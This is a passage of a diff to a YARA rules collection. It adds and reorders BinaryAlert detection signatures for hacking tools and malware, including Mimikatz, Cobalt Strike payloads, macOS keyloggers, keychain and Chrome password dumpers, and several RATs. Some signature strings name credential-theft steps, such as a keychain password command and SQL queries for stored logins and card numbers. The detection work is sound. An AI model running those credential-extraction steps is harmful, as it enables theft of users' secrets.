"a99a806b7c578af1f2163583f957db13fa7269c7426666189d85bec2ac87ad4b" + logic_hash = "f0e8a8b0c7398e7af06bd074eec0433265ba0e675bdbff354e59432c246b0b36" score = 75 quality = 80 tags = "" + md5_1 = "0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8" + md5_2 = "0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b" + md5_3 = "0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143" + md5_4 = "004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c" + md5_5 = "09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca" + md5_6 = "09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669" strings: - $s1 = "Poison all requests with another IP address than Responder's one." fullword ascii wide - $s2 = "Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned." fullword ascii wide - $s3 = "Enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network." fullword ascii wide - $s4 = "This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query." fullword ascii wide - $s5 = "Upstream HTTP proxy used by the rogue WPAD Proxy for outgoing requests (format: host:port)" fullword ascii wide - $s6 = "31mOSX detected, -i mandatory option is missing" fullword ascii wide - $s7 = "This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query." fullword ascii wide + $s1 = "Kiwi en C" fullword ascii wide + $s2 = "Benjamin DELPY `gentilkiwi`" fullword ascii wide + $s3 = "http://blog.gentilkiwi.com/mimikatz" fullword ascii wide + $s4 = "Build with love for POC only" fullword ascii wide + $s5 = "gentilkiwi (Benjamin DELPY)" fullword wide + $s6 = "KiwiSSP" fullword wide + $s7 = "Kiwi Security Support Provider" fullword wide + $s8 = "kiwi flavor !" fullword wide condition: any of them } -rule BINARYALERT_Hacktool_Macos_Exploit_Tpwn +rule BINARYALERT_Hacktool_Windows_Ncc_Wmicmd { meta: - description = "tpwn exploits a null pointer dereference in XNU to escalate privileges to root." + description = "Command shell wrapper for WMI" author = "@mimeframe" - id = "b69c4e1c-554e-5553-9b21-6cdf33aff24e" - date = "2017-09-14" - modified = "2017-09-14" - reference = "https://www.rapid7.com/db/modules/exploit/osx/local/tpwn" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_exploit_tpwn.yara#L1-L14" + id = "18bc36f7-b97a-5bce-a68b-c349713e9468" + date = "2017-08-11" + modified = "2017-08-11" + reference = "https://github.com/nccgroup/WMIcmd" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_ncc_wmicmd.yara#L1-L18" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "f864d8c137746edd50526b1d3d95a7335f776cf1473d2d2ea28856dbc515dd9f" + logic_hash = "bef6828a706dcfc3b573523fccd391a5ef3fa505235b1621a82527d64d32aaf0" score = 75 quality = 80 tags = "" strings: - $a1 = "[-] Couldn't find a ROP gadget, aborting." wide ascii - $a2 = "leaked kaslr slide," wide ascii - $a3 = "didn't get root, but this system is vulnerable." wide ascii - $a4 = "Escalating privileges! -qwertyoruiop" wide ascii + $a1 = "Need to specify a username, domain and password for non local connections" wide ascii + $a2 = "WS-Management is running on the remote host" wide ascii + $a3 = "firewall (if enabled) allows connections" wide ascii + $a4 = "WARNING: Didn't see stdout output finished marker - output may be truncated" wide ascii + $a5 = "Command sleep in milliseconds - increase if getting truncated output" wide ascii + $b1 = "0x800706BA" wide ascii + $b2 = "NTLMDOMAIN:" wide ascii + $b3 = "cimv2" wide ascii + + condition: + any of ($a*) or all of ($b*) +} +rule BINARYALERT_Hacktool_Windows_Cobaltstrike_Powershell : FILE +{ + meta: + description = "Detection of the PowerShell payloads from Cobalt Strike" + author = "@javutin, @joseselvi" + id = "155f181a-56cb-5295-a903-744f79012733" + date = "2017-12-14" + modified = "2017-12-14" + reference = "https://www.cobaltstrike.com/help-payload-generator" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_cobaltstrike_powershell.yara#L1-L21" + license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" + logic_hash = "39dd0aaa84d02aae5766d764c3d371f03f9df33acf5f6ae4ab4a8c73dd827213" + score = 75 + quality = 80 + tags = "FILE" + + strings: + $ps1 = "Set-StrictMode -Version 2" + $ps2 = "func_get_proc_address" + $ps3 = "func_get_delegate_type" + $ps4 = "FromBase64String" + $ps5 = "VirtualAlloc" + $ps6 = "var_code" + $ps7 = "var_buffer" + $ps8 = "var_hthread" + + condition: + $ps1 at 0 and filesize <1000KB and all of ($ps*) +} +import "math" +import "pe" + +rule BINARYALERT_Hacktool_Windows_Cobaltstrike_Artifact_Exe : FILE +{ + meta: + description = "Detection of the Artifact payload from Cobalt Strike" + author = "@javutin, @joseselvi" + id = "ca92eea2-ad19-56df-af73-bebfc3690377" + date = "2017-12-14" + modified = "2017-12-14" + reference = "https://www.cobaltstrike.com/help-artifact-kit" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_cobaltstrike_artifact.yara#L6-L17" + license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" + logic_hash = "f2f3b9936041cb4bb4b5613d2522553b9835704e1be52993e757fc0edbdd7871" + score = 75 + quality = 55 + tags = "FILE" + + condition: + BINARYALERT_Cobaltstrike_Template_Exe_PRIVATE and filesize <100KB and pe.sections[pe.section_index(".data")].raw_data_size>512 and math.entropy(pe.sections[pe.section_index(".data")].raw_data_offset,512)>=7 +} +rule BINARYALERT_Hacktool_Windows_Rdp_Cmd_Delivery +{ + meta: + description = "Delivers a text payload via RDP (rubber ducky)" + author = "@fusionrace" + id = "8d035721-34ee-566f-8851-1c9501de2704" + date = "2017-08-11" + modified = "2017-08-11" + reference = "https://github.com/nopernik/mytools/blob/master/rdp-cmd-delivery.sh" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_rdp_cmd_delivery.yara#L1-L14" + license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" + logic_hash = "98bc02bb651fba069828b5960ee47542828f0d530e5e280b15abb0573b8e0168" + score = 75 + quality = 80 + tags = "" + + strings: + $s1 = "Usage: rdp-cmd-delivery.sh OPTIONS" ascii wide + $s2 = "[--tofile 'c:\\test.txt' local.ps1 #will copy contents of local.ps1 to c:\\test.txt" ascii wide + $s3 = "-cmdfile local.bat #will execute everything from local.bat" ascii wide + $s4 = "To deliver powershell payload, use '--cmdfile script.ps1' but inside powershell console" ascii wide condition: - 2 of ($a*) + any of them } -rule BINARYALERT_Hacktool_Macos_N0Fate_Chainbreaker +rule BINARYALERT_Hacktool_Macos_Keylogger_Caseyscarborough { meta: - description = "chainbreaker can extract user credential in a Keychain file with Master Key or user password in forensically sound manner." + description = "A simple and easy to use keylogger for macOS." author = "@mimeframe" - id = "565d31c6-8d80-534d-8acc-c01d7af4f8b3" + id = "82d9ff7e-b475-5888-82e1-f65c286a9cde" date = "2017-09-12" modified = "2017-09-12" - reference = "https://github.com/n0fate/chainbreaker" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_n0fate_chainbreaker.yara#L1-L13" + reference = "https://github.com/caseyscarborough/keylogger" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_keylogger_caseyscarborough.yara#L1-L14" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "7aedf952756ed2375ff171329179f14a8cdc37ada69e1f003def1f1de5bc1691" + logic_hash = "d97fbfefe027a26ec998743b811734e62423e8a5ba4e11d516dcfc9e4831d296" score = 75 quality = 80 tags = "" strings: - $a1 = "[!] Private Key Table is not available" wide ascii - $a2 = "[!] Public Key Table is not available" wide ascii - $a3 = "[-] Decrypted Private Key" wide ascii + $a1 = "/var/log/keystroke.log" wide ascii + $a2 = "ERROR: Unable to create event tap." wide ascii + $a3 = "Keylogging has begun." wide ascii + $a4 = "ERROR: Unable to open log file. Ensure that you have the proper permissions." wide ascii condition: - all of ($a*) + 2 of ($a*) } rule BINARYALERT_Hacktool_Macos_Keylogger_B4Rsby_Swiftlog { @@ -115818,56 +118009,80 @@ rule BINARYALERT_Hacktool_Macos_Keylogger_B4Rsby_Swiftlog condition: all of ($a*) } -rule BINARYALERT_Hacktool_Macos_Keylogger_Skreweverything_Swift +rule BINARYALERT_Hacktool_Macos_Keylogger_Eldeveloper_Keystats { meta: - description = "It is a simple and easy to use keylogger for macOS written in Swift." + description = "A simple keylogger for macOS." author = "@mimeframe" - id = "a4918bc3-d3f0-59f4-894f-fd34ee944fac" + id = "7fddb502-ae2d-5e14-95f5-115498fa5926" date = "2017-09-12" modified = "2017-09-12" - reference = "https://github.com/SkrewEverything/Swift-Keylogger" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_keylogger_skreweverything_swift.yara#L1-L15" + reference = "https://github.com/ElDeveloper/keystats" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_keylogger_eldeveloper_keystats.yara#L1-L13" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "f400b8ec392417e7443e82a2c2a9adfc868b9795aa1fb29f91d228f6f94efd13" + logic_hash = "c73f5ca2ba0a1bde7c1f9b96173938e40511e12f875c4d850d6d498c63e89385" score = 75 quality = 80 tags = "" strings: - $a1 = "Can't create directories!" wide ascii - $a2 = "Can't create manager" wide ascii - $a3 = "Can't open HID!" wide ascii - $a4 = "PRINTSCREEN" wide ascii - $a5 = "LEFTARROW" wide ascii + $a1 = "YVBKeyLoggerPerishedNotification" wide ascii + $a2 = "YVBKeyLoggerPerishedByLackOfResponseNotification" wide ascii + $a3 = "YVBKeyLoggerPerishedByUserChangeNotification" wide ascii condition: - 4 of ($a*) + 2 of ($a*) } -rule BINARYALERT_Hacktool_Macos_Manwhoami_Icloudcontacts +rule BINARYALERT_Hacktool_Macos_Keylogger_Roxlu_Ofxkeylogger { meta: - description = "Pulls iCloud Contacts for an account. No dependencies. No user notification." + description = "ofxKeylogger keylogger." author = "@mimeframe" - id = "b6595540-7f89-5764-b34e-d32c1a377b6c" + id = "c0e00b76-9623-5709-b64b-0afe006eba60" date = "2017-09-12" modified = "2017-09-12" - reference = "https://github.com/manwhoami/iCloudContacts" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_manwhoami_icloudcontacts.yara#L1-L14" + reference = "https://github.com/roxlu/ofxKeylogger" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_keylogger_roxlu_ofxkeylogger.yara#L1-L13" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "0c5b81454b26de91f5ad126b24f10397e1da5d8561b0bf22c5df128753df0ac2" + logic_hash = "6e2579a10327cc8f1799848b3bcbcd95733a31098faeb849df6ebf99f1ffe808" score = 75 quality = 80 tags = "" strings: - $a1 = "https://setup.icloud.com/setup/authenticate/" wide ascii - $a2 = "https://p04-contacts.icloud.com/" wide ascii - $a3 = "HTTP Error 401: Unauthorized. Are you sure the credentials are correct?" wide ascii - $a4 = "HTTP Error 404: URL not found. Did you enter a username?" wide ascii + $a1 = "keylogger_init" wide ascii + $a2 = "install_keylogger_hook function not found in dll." wide ascii + $a3 = "keylogger_set_callback" wide ascii condition: - 3 of ($a*) + all of ($a*) +} +rule BINARYALERT_Hacktool_Macos_Juuso_Keychaindump +{ + meta: + description = "For reading OS X keychain passwords as root." + author = "@mimeframe" + id = "10ee6c24-db35-5178-9a40-92f5231948aa" + date = "2017-09-12" + modified = "2017-09-12" + reference = "https://github.com/juuso/keychaindump" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_juuso_keychaindump.yara#L1-L16" + license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" + logic_hash = "dd2fb6249fe4b7381e734ea3a308158159f7e79b39ba5c970241dcd66436d669" + score = 75 + quality = 80 + tags = "" + + strings: + $a1 = "[-] Too many candidate keys to fit in memory" wide ascii + $a2 = "[-] Could not allocate memory for key search" wide ascii + $a3 = "[-] Too many credentials to fit in memory" wide ascii + $a4 = "[-] The target file is not a keychain file" wide ascii + $a5 = "[-] Could not find the securityd process" wide ascii + $a6 = "[-] No root privileges, please run with sudo" wide ascii + + condition: + 4 of ($a*) } rule BINARYALERT_Hacktool_Macos_Ptoomey3_Keychain_Dumper { @@ -115895,32 +118110,31 @@ rule BINARYALERT_Hacktool_Macos_Ptoomey3_Keychain_Dumper condition: all of ($a*) } -rule BINARYALERT_Hacktool_Macos_Manwhoami_Osxchromedecrypt +rule BINARYALERT_Hacktool_Macos_Keylogger_Skreweverything_Swift { meta: - description = "Decrypt Google Chrome / Chromium passwords and credit cards on macOS / OS X." + description = "It is a simple and easy to use keylogger for macOS written in Swift." author = "@mimeframe" - id = "874cc999-d9c2-5017-83ec-e4be8a659476" + id = "a4918bc3-d3f0-59f4-894f-fd34ee944fac" date = "2017-09-12" modified = "2017-09-12" - reference = "https://github.com/manwhoami/OSXChromeDecrypt" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_manwhoami_osxchromedecrypt.yara#L1-L16" + reference = "https://github.com/SkrewEverything/Swift-Keylogger" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_keylogger_skreweverything_swift.yara#L1-L15" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "0974c6a5e7875e20380df0f58bf22a589b9a5c718e635ec77b42060abcf99473" + logic_hash = "f400b8ec392417e7443e82a2c2a9adfc868b9795aa1fb29f91d228f6f94efd13" score = 75 quality = 80 tags = "" strings: - $a1 = "Credit Cards for Chrome Profile" wide ascii - $a2 = "Passwords for Chrome Profile" wide ascii - $a3 = "Unknown Card Issuer" wide ascii - $a4 = "ERROR getting Chrome Safe Storage Key" wide ascii - $b1 = "select name_on_card, card_number_encrypted, expiration_month, expiration_year from credit_cards" wide ascii - $b2 = "select username_value, password_value, origin_url, submit_element from logins" wide ascii + $a1 = "Can't create directories!" wide ascii + $a2 = "Can't create manager" wide ascii + $a3 = "Can't open HID!" wide ascii + $a4 = "PRINTSCREEN" wide ascii + $a5 = "LEFTARROW" wide ascii condition: - 3 of ($a*) or all of ($b*) + 4 of ($a*) } rule BINARYALERT_Hacktool_Macos_Keylogger_Logkext { @@ -115954,6 +118168,31 @@ rule BINARYALERT_Hacktool_Macos_Keylogger_Logkext condition: 3 of ($a*) or all of ($b*) or all of ($c*) or all of ($d*) } +rule BINARYALERT_Hacktool_Macos_Exploit_Tpwn +{ + meta: + description = "tpwn exploits a null pointer dereference in XNU to escalate privileges to root." + author = "@mimeframe" + id = "b69c4e1c-554e-5553-9b21-6cdf33aff24e" + date = "2017-09-14" + modified = "2017-09-14" + reference = "https://www.rapid7.com/db/modules/exploit/osx/local/tpwn" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_exploit_tpwn.yara#L1-L14" + license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" + logic_hash = "f864d8c137746edd50526b1d3d95a7335f776cf1473d2d2ea28856dbc515dd9f" + score = 75 + quality = 80 + tags = "" + + strings: + $a1 = "[-] Couldn't find a ROP gadget, aborting." wide ascii + $a2 = "leaked kaslr slide," wide ascii + $a3 = "didn't get root, but this system is vulnerable." wide ascii + $a4 = "Escalating privileges! -qwertyoruiop" wide ascii + + condition: + 2 of ($a*) +} rule BINARYALERT_Hacktool_Macos_Keylogger_Dannvix { meta: @@ -115978,32 +118217,30 @@ rule BINARYALERT_Hacktool_Macos_Keylogger_Dannvix condition: all of ($a*) } -rule BINARYALERT_Hacktool_Macos_Juuso_Keychaindump +rule BINARYALERT_Hacktool_Macos_Manwhoami_Icloudcontacts { meta: - description = "For reading OS X keychain passwords as root." + description = "Pulls iCloud Contacts for an account. No dependencies. No user notification." author = "@mimeframe" - id = "10ee6c24-db35-5178-9a40-92f5231948aa" + id = "b6595540-7f89-5764-b34e-d32c1a377b6c" date = "2017-09-12" modified = "2017-09-12" - reference = "https://github.com/juuso/keychaindump" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_juuso_keychaindump.yara#L1-L16" + reference = "https://github.com/manwhoami/iCloudContacts" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_manwhoami_icloudcontacts.yara#L1-L14" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "dd2fb6249fe4b7381e734ea3a308158159f7e79b39ba5c970241dcd66436d669" + logic_hash = "0c5b81454b26de91f5ad126b24f10397e1da5d8561b0bf22c5df128753df0ac2" score = 75 quality = 80 tags = "" strings: - $a1 = "[-] Too many candidate keys to fit in memory" wide ascii - $a2 = "[-] Could not allocate memory for key search" wide ascii - $a3 = "[-] Too many credentials to fit in memory" wide ascii - $a4 = "[-] The target file is not a keychain file" wide ascii - $a5 = "[-] Could not find the securityd process" wide ascii - $a6 = "[-] No root privileges, please run with sudo" wide ascii + $a1 = "https://setup.icloud.com/setup/authenticate/" wide ascii + $a2 = "https://p04-contacts.icloud.com/" wide ascii + $a3 = "HTTP Error 401: Unauthorized. Are you sure the credentials are correct?" wide ascii + $a4 = "HTTP Error 404: URL not found. Did you enter a username?" wide ascii condition: - 4 of ($a*) + 3 of ($a*) } rule BINARYALERT_Hacktool_Macos_Keylogger_Giacomolaw { @@ -116029,80 +118266,6 @@ rule BINARYALERT_Hacktool_Macos_Keylogger_Giacomolaw condition: 2 of ($a*) } -rule BINARYALERT_Hacktool_Macos_Keylogger_Roxlu_Ofxkeylogger -{ - meta: - description = "ofxKeylogger keylogger." - author = "@mimeframe" - id = "c0e00b76-9623-5709-b64b-0afe006eba60" - date = "2017-09-12" - modified = "2017-09-12" - reference = "https://github.com/roxlu/ofxKeylogger" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_keylogger_roxlu_ofxkeylogger.yara#L1-L13" - license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "6e2579a10327cc8f1799848b3bcbcd95733a31098faeb849df6ebf99f1ffe808" - score = 75 - quality = 80 - tags = "" - - strings: - $a1 = "keylogger_init" wide ascii - $a2 = "install_keylogger_hook function not found in dll." wide ascii - $a3 = "keylogger_set_callback" wide ascii - - condition: - all of ($a*) -} -rule BINARYALERT_Hacktool_Macos_Manwhoami_Mmetokendecrypt -{ - meta: - description = "This program decrypts / extracts all authorization tokens on macOS / OS X / OSX." - author = "@mimeframe" - id = "2dc01ff3-4c4a-548d-b2f0-b36897ad6a5c" - date = "2017-09-12" - modified = "2017-09-12" - reference = "https://github.com/manwhoami/MMeTokenDecrypt" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_manwhoami_mmetokendecrypt.yara#L1-L15" - license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "ccfedfbff0c6eefe41e80fe488d4cae928a33e7b86019c6ec54d1c9005b35147" - score = 75 - quality = 80 - tags = "" - - strings: - $a1 = "security find-generic-password -ws 'iCloud'" wide ascii - $a2 = "ERROR getting iCloud Decryption Key" wide ascii - $a3 = "Could not find MMeTokenFile. You can specify the file manually." wide ascii - $a4 = "Decrypting token plist ->" wide ascii - $a5 = "Successfully decrypted token plist!" wide ascii - - condition: - 3 of ($a*) -} -rule BINARYALERT_Hacktool_Macos_Keylogger_Eldeveloper_Keystats -{ - meta: - description = "A simple keylogger for macOS." - author = "@mimeframe" - id = "7fddb502-ae2d-5e14-95f5-115498fa5926" - date = "2017-09-12" - modified = "2017-09-12" - reference = "https://github.com/ElDeveloper/keystats" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_keylogger_eldeveloper_keystats.yara#L1-L13" - license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "c73f5ca2ba0a1bde7c1f9b96173938e40511e12f875c4d850d6d498c63e89385" - score = 75 - quality = 80 - tags = "" - - strings: - $a1 = "YVBKeyLoggerPerishedNotification" wide ascii - $a2 = "YVBKeyLoggerPerishedByLackOfResponseNotification" wide ascii - $a3 = "YVBKeyLoggerPerishedByUserChangeNotification" wide ascii - - condition: - 2 of ($a*) -} rule BINARYALERT_Hacktool_Macos_Exploit_Cve_5889 { meta: @@ -116130,31 +118293,6 @@ rule BINARYALERT_Hacktool_Macos_Exploit_Cve_5889 condition: all of ($a*) } -rule BINARYALERT_Hacktool_Macos_Keylogger_Caseyscarborough -{ - meta: - description = "A simple and easy to use keylogger for macOS." - author = "@mimeframe" - id = "82d9ff7e-b475-5888-82e1-f65c286a9cde" - date = "2017-09-12" - modified = "2017-09-12" - reference = "https://github.com/caseyscarborough/keylogger" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_keylogger_caseyscarborough.yara#L1-L14" - license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "d97fbfefe027a26ec998743b811734e62423e8a5ba4e11d516dcfc9e4831d296" - score = 75 - quality = 80 - tags = "" - - strings: - $a1 = "/var/log/keystroke.log" wide ascii - $a2 = "ERROR: Unable to create event tap." wide ascii - $a3 = "Keylogging has begun." wide ascii - $a4 = "ERROR: Unable to open log file. Ensure that you have the proper permissions." wide ascii - - condition: - 2 of ($a*) -} rule BINARYALERT_Hacktool_Macos_Macpmem { meta: @@ -116184,355 +118322,307 @@ rule BINARYALERT_Hacktool_Macos_Macpmem condition: BINARYALERT_Macho_PRIVATE and 2 of ($a*) or all of ($b*) } -rule BINARYALERT_Malware_Windows_Remcos_Rat +rule BINARYALERT_Hacktool_Macos_Manwhoami_Osxchromedecrypt { meta: - description = "No description has been set in the source file - BinaryAlert" + description = "Decrypt Google Chrome / Chromium passwords and credit cards on macOS / OS X." author = "@mimeframe" - id = "420c135f-3150-5cb9-9c1c-105cd260d713" - date = "2017-08-11" - modified = "2017-08-11" - reference = "https://breaking-security.net/remcos/remcos-changelog/" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_remcos_rat.yara#L1-L20" + id = "874cc999-d9c2-5017-83ec-e4be8a659476" + date = "2017-09-12" + modified = "2017-09-12" + reference = "https://github.com/manwhoami/OSXChromeDecrypt" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_manwhoami_osxchromedecrypt.yara#L1-L16" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - hash = "c8dafe143fe1d81ae6a3c0cd4724b272" - logic_hash = "ec1ec69f628111235bafad8177482256ed571c064a81f01b6ec2643dccc926ad" + logic_hash = "0974c6a5e7875e20380df0f58bf22a589b9a5c718e635ec77b42060abcf99473" score = 75 quality = 80 tags = "" strings: - $a1 = "[Following text has been pasted from clipboard:]" wide ascii - $a2 = "[Chrome StoredLogins found, cleared!]" wide ascii - $a3 = "[Firefox StoredLogins cleared!]" wide ascii - $b1 = "getclipboard" wide ascii - $b2 = "stopmiccapture" wide ascii - $b3 = "downloadfromurltofile" wide ascii - $b4 = "getcamsingleframe" wide ascii - $c1 = "Breaking-Security.Net" wide ascii - $c2 = "REMCOS v" wide ascii + $a1 = "Credit Cards for Chrome Profile" wide ascii + $a2 = "Passwords for Chrome Profile" wide ascii + $a3 = "Unknown Card Issuer" wide ascii + $a4 = "ERROR getting Chrome Safe Storage Key" wide ascii + $b1 = "select name_on_card, card_number_encrypted, expiration_month, expiration_year from credit_cards" wide ascii + $b2 = "select username_value, password_value, origin_url, submit_element from logins" wide ascii condition: - any of ($a*) or 3 of ($b*) or all of ($c*) + 3 of ($a*) or all of ($b*) } -rule BINARYALERT_Malware_Windows_Apt_Red_Leaves_Generic +rule BINARYALERT_Hacktool_Macos_Manwhoami_Mmetokendecrypt { meta: - description = "Red Leaves malware, related to APT10" - author = "David Cannings" - id = "e0067b05-eb4a-52ec-8f35-9336a631f03b" + description = "This program decrypts / extracts all authorization tokens on macOS / OS X / OSX." + author = "@mimeframe" + id = "2dc01ff3-4c4a-548d-b2f0-b36897ad6a5c" date = "2017-09-12" modified = "2017-09-12" - reference = "https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Red%20Leaves/Source/Red%20Leaves%20technical%20note%20v1.0.md" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_apt_red_leaves_generic.yara#L1-L27" + reference = "https://github.com/manwhoami/MMeTokenDecrypt" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_manwhoami_mmetokendecrypt.yara#L1-L15" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - hash = "81df89d6fa0b26cadd4e50ef5350f341" - logic_hash = "be03bba9d01e6584b5849514656fd7de866c478f343c0bc618d7dbeda1771696" + logic_hash = "ccfedfbff0c6eefe41e80fe488d4cae928a33e7b86019c6ec54d1c9005b35147" score = 75 quality = 80 tags = "" strings: - $a1 = "Feb 04 2015" - $a2 = "I can not start %s" - $a3 = "dwConnectPort" fullword - $a4 = "dwRemoteLanPort" fullword - $a5 = "strRemoteLanAddress" fullword - $a6 = "strLocalConnectIp" fullword - $a7 = "\\\\.\\pipe\\NamePipe_MoreWindows" wide - $a8 = "RedLeavesCMDSimulatorMutex" wide - $a9 = "(NT %d.%d Build %d)" wide - $a10 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)" wide - $a11 = "red_autumnal_leaves_dllmain.dll" wide ascii - $a12 = "__data" wide - $a13 = "__serial" wide - $a14 = "__upt" wide - $a15 = "__msgid" wide + $a1 = "security find-generic-password -ws 'iCloud'" wide ascii + $a2 = "ERROR getting iCloud Decryption Key" wide ascii + $a3 = "Could not find MMeTokenFile. You can specify the file manually." wide ascii + $a4 = "Decrypting token plist ->" wide ascii + $a5 = "Successfully decrypted token plist!" wide ascii condition: - 7 of ($a*) + 3 of ($a*) } -rule BINARYALERT_Malware_Windows_Xrat_Quasarrat +rule BINARYALERT_Hacktool_Macos_N0Fate_Chainbreaker { meta: - description = "xRAT is a derivative of QuasarRAT; this catches both RATs." + description = "chainbreaker can extract user credential in a Keychain file with Master Key or user password in forensically sound manner." author = "@mimeframe" - id = "f4db2402-3653-5525-a137-de2de29cef28" + id = "565d31c6-8d80-534d-8acc-c01d7af4f8b3" date = "2017-09-12" modified = "2017-09-12" - reference = "https://github.com/quasar/QuasarRAT" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_xrat_quasarrat.yara#L1-L31" + reference = "https://github.com/n0fate/chainbreaker" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_n0fate_chainbreaker.yara#L1-L13" 